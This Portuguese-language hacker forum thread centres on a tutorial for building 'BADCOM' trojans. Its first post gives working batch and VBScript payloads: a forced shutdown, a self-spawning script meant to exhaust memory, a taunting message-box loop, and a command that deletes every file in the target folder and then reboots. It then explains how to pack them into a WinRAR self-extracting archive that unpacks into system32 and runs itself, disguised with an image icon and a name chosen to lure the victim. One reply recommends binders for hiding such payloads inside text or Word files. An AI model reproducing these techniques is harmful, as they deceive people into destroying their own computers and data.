Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

BADCOM - Melhorando a camuflagem

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #1

    Tutorial BADCOM - Melhorando a camuflagem

    Este esquema eu desenvolvi a algum tempo(Caso este método exista por ai exatamente como este aqui, peço desculpas ao autor, mas até agora eu nunca vi!!), e postei ele em outro fórum Hacker a vários meses atrás, agora estou trazendo para cá

    As vezes quando alguem quer mandar arquivos que não são muito desejados para outras pessoas, geralmente elas tentam mudar o ícone dele de algumas forma, como usar o método SFX do Winrar (Já vou entrar nele), mas acontece que os arquivos são apenas extraídos, sem serem executados, outra coisa é que não dá pra executar mais de um arquivo junto estando dentro do mesmo arquivo SFX e assim vai.

    Aqui vou ensinar a base e dar alguns exemplos de como isso pode ser usado, desde para causar um pequeno susto, ou ir mais além e detonar o PC do alvo!
    Primeiro de tudo a gente precisa de um programa chamado Ícone Fácil, ele é uma espécie de PAINT, mas voltado para a edição de ícones. Precisaremos dele para extrairmos os ícones que estão "presos" dentro das dll's do Windows, caso contrário precisaríamos baixar pacotes de ícones da Internet, e não sei se é fácil de encontrar aqueles que são iguais do Windows (Imagens, Som e etc).

    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...

    Após feito o download e instalado o programa, siga os seguinte passos que são os necessários para se conseguir os ícones desejados:

    Execute o programa, clique na aba Arquivo e em seguida em Importar

    Após isso irá vêr um menu com inúmeras dll's do Windows, cada uma delas contém os seus respectivos ícones, vamos usar um ícone de imagem JPG, algo fácil de alguem aceitar! Então localiza a dll shimgvw.dll, escolha o ícone e de OK.



    Você verá a seguinte imagem:



    Então vá em Salvar Como


    E escolha a pasta e o nome de seu ícone. No nosso a pasta se chama "Exemplo" e o ícone "Ops"...mas não se esqueça de salvar o arquivo na extensão .ICO


    Aqui se encerra o processo de extração do ícone desejado, deixe ele de lado por enquanto! Agora antes partimos para a conclusão que está no fim deste tópico, vamos mencionar os diferentes tipos de comandos que vocês podem criar para fazer o que quiserem, e decidam qual querrem usar.



    1- Apenas um susto


    Abra um arquivo de texto, coloque as seguintes linhas nele e salve como autoexec.bat
    Código:
    @echo off
    start desligar.bat
    exit
    Crie outro .BAT chamado desligar e coloque estas linhas
    Código:
        shutdown -s -t 10 -c "TEXTO DESEJADO"
    Isso irá desligar o PC dentro do tempo colocado, depois do -t



    2- Sobrecarregando a memória do PC (Ou quase)

    Crie um autoexec.bat com estas linhas
    Código:
    @echo off
    start sobrecarga.bat
    E outro chamado sobrecarga.bat
    Código:
    @echo off
    start qualquer_imagem.jpg
    start qualquer_audio.mp3
    start qualquer_arquivo.exe
    start sobrecarga.bat
    Aqui ele realiza um processo chamado Recurssividade, que é chamar a si próprio infinitas vezes, o autoexec.bat chama o sobrecarga.bat, que por sua vez chama aqueles 3 arquivos depois do start (São apenas exemplos) e após chamar os 3 como pode vêr, no final ele chama a si próprio novamente, que irá realizar todo o processo denovo.

    DETALHE: No final das linhas dos dois arquivos você NÃO DEVE colocar o EXIT ao contrário do exemplo anterior, pois assim a janela do Prompt irá permacer aberta, e mais rápido irá sobrecarregar a memória. Você pode colocar quantos arquivos quiser, ou apenas uma imagem, mas quanto mais pesada for a imagem(qualidade e tamanho), ou quanto mais pesados forem os arquivos, maior será o efeito.


    3- Mensagem mais elaborada


    Denovo crie o autoexec.bat e coloque as mesmas linhas (Direto será assim)
    Código:
    @echo off
    start noob.vbs
    exit
    Abra um arquivo de texto e digite isso e salve com o nome noob.vbs
    Código:
    msgbox "Para seu bem não clique em OK"
    msgbox "Eu avisei, iniciar contagem...5"
    msgbox "PARA, já falei!!...4"
    msgbox "Teimoso...3"
    msgbox "ZZZZzzzz....2"
    msgbox "Ultima chance!!!!...1"
    msgbox "BUMM..NOOB, como caiu nesta??"
    Claro que você pode escrever o quiser, o legal deste é que mesmo que clique no fechar (X), ele não vai fechar e vai continuar como se clicasse no OK.


    4- Detonando o PC de vez!!



    Crie novamente um arquivo autoexec.bat com estas linhas
    Código:
    @echo off
    start deletar.bat
    exit
    E outro chamado deletar.bat com estas linhas de comando:
    Código:
    @echo off
    del *.* /q
    shutdown -r -t 10
    exit
    Este arquivo será mandado para a pasta desejada e irá deletar TUDO nela, e parelelo a isso irá reiniciar o PC em 10 segundos, logo mais mostrarei como mandar ele na pasta System 32, que neste caso irá detonar o PC porque irá deletar tudo (Tudo que importa pro Windows está lá!!) e irá reiniciar, ou melhor, tentar reiniciar, porque dai já era.



    Conclusão - "Empacotando" cada um dos métodos anteriores



    Após escolhido qual dos 4 você quer fazer, vou mostrar como trocar o ícone pelo método SFX que alguns já conhecem, e como fazer o arquivo rodar ao ser executado, vou usar o método 4. Já criou o autoexec.bat e o deletar.bat?? Ok...selecione os dois, clique esquerdo neles a vá no Winrar em "Adicionar para o arquivo...", você verá esta janela, estão selecione a opção SFX. Chamaremos este arquivo de Exemplo.exe.



    Clique na aba Avançado e depois em "Opções SFX...", você verá esta imagem:



    No campo "Caminho para a extração" no topo, deverá colocar a pasta que deseja mandar seu arquivo, no nosso caso a pasta system 32, o endereço ficará C:\WINDOWS\system32, e em "Executar após a extração" o nosso autoexec.bat que criamos.

    Na aba métodos deverá selecionar as seguintes opções:



    Por último a parte mais importante, a escolha do ícone que extraimos, aquele da imagem JPG, clique conforme a imagem e vá na pasta onde salvou, no nosso caso a pasta "Exemplo" e o selecione.





    Agora pode dar OK em tudo e deixar o Winrar fazer o trabalho!!
    Quando a pessoa clicar no arquivo, achando ser uma figura (Coloque um nome que você acha que ela abrirá, se for um viciado em Anime, chame a suposta imagem de "Naruto", por exemplo)e for executado, o Winrar irá extrair os dois na pasta System 32 e depois executar o autoexec.bat, que por sua vez executará o deletar.bat, que irá apagar TUDO na pasta System 32 (Inclusive a eles dois) e simultaneamente dará início ao processo de reinicialização do PC, que não será reiniciado logicamente!

    O mesmo vale para todos os outros exemplos, lembre-se de que no método 2 você deve selecionar todos os arquivos (Audio, imagem e etc) e criar num mesmo. E não precisa ser com os mesmos nomes que citei, estes foram apenas para facilitar o entendimento.
    Agora é com você, use a sua criatividade, misture os métodos e invente outros, pode mesclar isso com badcoms de outros tipos como aqueles AVKills que neutraluzam os AV e etc, mas não vá prejudicar ninguem seriamente, você pode fazer os piores com você quando quiser formatar o PC, dai não tem o que perder

    Este é o fim do nosso Tutorial, espero não ter judiado da sua barra de rolagem.


    Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
    Last edited by David Felipe; 19-06-2010, 15:02. Motivo: reupado Link - por PRIME
    Similar Threads

  • Font Size
    #2
    Bompost, agora seria interessanto criar um arquivo bat com estes comandos maliciosos, colocar dentro de uma arquivo txt por meio do software binder ou The joiner e quando a pessoa clicar, vai executar o arquivo bat e danificar o sistema.
    Eu faço isso na minha honey pot que está com arquivos específicos em txt ou word, cujos nomes são contasesenhas.txt com o badcoms escondido para deletar tudo e reiniciar, e o númeroscartãocrédido.doc com o mesmo badcom escondido. O muitos hackers e script kiddies já pegaram e executaram o arquivo e danificaram seus computadores.

    Vale a pena usar este método do winrar, e quando o hacker ou scripp kiddie for extrair, ele vai para a pasta windows 32 e vai danificar o sistema dele, terá que formatar sua máquina virtual, ou seu pc se for o caso, por que muitos hackers usam o próprio pc para invasão para conseguir maior velocidade no processo.
    WarMachine - Ethical Hacker - White Hat
    Assembly/C/C++/C#/Java/Asp Programmer

    Saiba invadir para não ser invadido. Quem faz o mal não tem idéia de quanto mal faz a si mesmo. Seja do bem. Seja um profissional de segurança e use os conhecimentos para defesa de sistemas de informação.

    Comment


    • Font Size
      #3
      Haha
      Vlw bem interessante.
      Quanto mais aprendo mais vejo o tamanho da minha ignorânica.
      sigpic

      Comment


      • Font Size
        #4
        Galerinha vo fala do bagulho de muda icone,eu ja vi esse metodo antes,porem com outros programas,e a logica disso é q so vai muda no seu computador,por que qndo vc altera a dll do windows,vai altera oq o seu windows mostra para voce,mais qndo vc manda pra o krinha,ele vai ver o icone real,entenderam,so muda no seu pc,e a mesma coisa do cheat engine(se é q vc conhecem,so altera o client side em algumas coisas..).Mas oq vale é a intenção,bom post.

        Comment


        • Font Size
          #5
          merda,falei sem ler o post todo,eskecem oq eu falei acima mals >.<

          Comment

          X
          Working...
          X